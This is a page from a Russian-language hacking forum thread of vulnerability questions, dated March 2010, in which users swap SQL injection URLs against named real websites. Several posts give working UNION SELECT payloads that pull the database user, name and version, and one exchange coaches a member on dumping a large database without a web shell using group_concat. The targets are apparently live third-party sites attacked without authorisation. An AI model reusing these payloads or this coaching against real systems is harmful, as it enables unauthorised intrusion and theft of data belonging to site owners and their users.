ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1204 из 1393 « Первая < 204704110411541194 1200 1201 1202 1203 1204 1205 1206 1207 1208 121412541304 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #12031  
Старый 16.03.2010, 19:02
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Цитата:
Сообщение от Seravin  
1) это дело привычки
2)
Код:
http://kip.medaar.ru/prod.php?idsub=-1+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
Код:
http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
(долго это искал чтоб показать)
Цитата:
http://kip.medaar.ru/prod.php?idsub=999+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
На - реагирует
 
Ответить с цитированием

  #12032  
Старый 16.03.2010, 19:04
-=ASSKAKO=-
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме:
1128838

Репутация: 36
По умолчанию
подскажите пожалуйста, как можно снять дамп бд не имея веб шелла т.е. есть скл иньекция, есть вывод всех таблиц и колонок, содержимого... но проблема в том что БД очень большая и незнаю такой тулзы которым можно автоматизировать процесс т.к делать запрос where+table_name и тем более выдерать оттуда данные не очень удобно.((
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (
 
Ответить с цитированием

  #12033  
Старый 16.03.2010, 19:07
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от -=ASSKAKO=-  
подскажите пожалуйста, как можно снять дамп бд не имея веб шелла т.е. есть скл иньекция, есть вывод всех таблиц и колонок, содержимого... но проблема в том что БД очень большая и незнаю такой тулзы которым можно автоматизировать процесс т.к делать запрос where+table_name и тем более выдерать оттуда данные не очень удобно.((
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (
не очень удобно это как??
 
Ответить с цитированием

  #12034  
Старый 16.03.2010, 19:12
-=ASSKAKO=-
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме:
1128838

Репутация: 36
По умолчанию
таблиц и данных в БД много, вбивать вручную имя каждой таблицы, колонки и выдирать оттуда данные = пальцы устали(
 
Ответить с цитированием

  #12035  
Старый 16.03.2010, 19:14
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от -=ASSKAKO=-  
таблиц и данных в БД много, вбивать вручную имя каждой таблицы, колонки и выдирать оттуда данные = пальцы устали(
А group_concat использовать пробовал?
 
Ответить с цитированием

  #12036  
Старый 16.03.2010, 19:16
-=ASSKAKO=-
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме:
1128838

Репутация: 36
По умолчанию
нет,если б знал как правильно составить запрос((
Цитата:
СИПТ либо настроил неправильно, либо руки растут оттуда откуда сижу, скорее второе (
точно второе...
пошел РТФМ
 
Ответить с цитированием

  #12037  
Старый 16.03.2010, 19:18
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию
Цитата:
http://www.ecominfo.spb.ru/about/print.php?id=1211+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+
Скажите, а это уже слепая?
 
Ответить с цитированием

  #12038  
Старый 16.03.2010, 19:22
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Цитата:
Сообщение от CyberHunter  
Скажите, а это уже слепая?
Цитата:
http://www.ecominfo.spb.ru/about/print.php?id=-1211+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),database(),version()),15,16,17 ,18,19,20,21,22,23,24,25,26+--+
:'(
 
Ответить с цитированием

  #12039  
Старый 16.03.2010, 19:22
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию
Код:
http://www.ecominfo.spb.ru/about/print.php?id=-1211+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+%20--+
а чо бы ей быть слепой?вывод есть!
 
Ответить с цитированием

  #12040  
Старый 16.03.2010, 19:24
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Цитата:
Сообщение от CyberHunter  
Скажите, а это уже слепая?
Слепота в каком месте???
Код:
http://www.ecominfo.spb.ru/about/print.php?id=1211+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26+--+
 
Ответить с цитированием
Ответ
Страница 1204 из 1393 « Первая < 204704110411541194 1200 1201 1202 1203 1204 1205 1206 1207 1208 121412541304 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ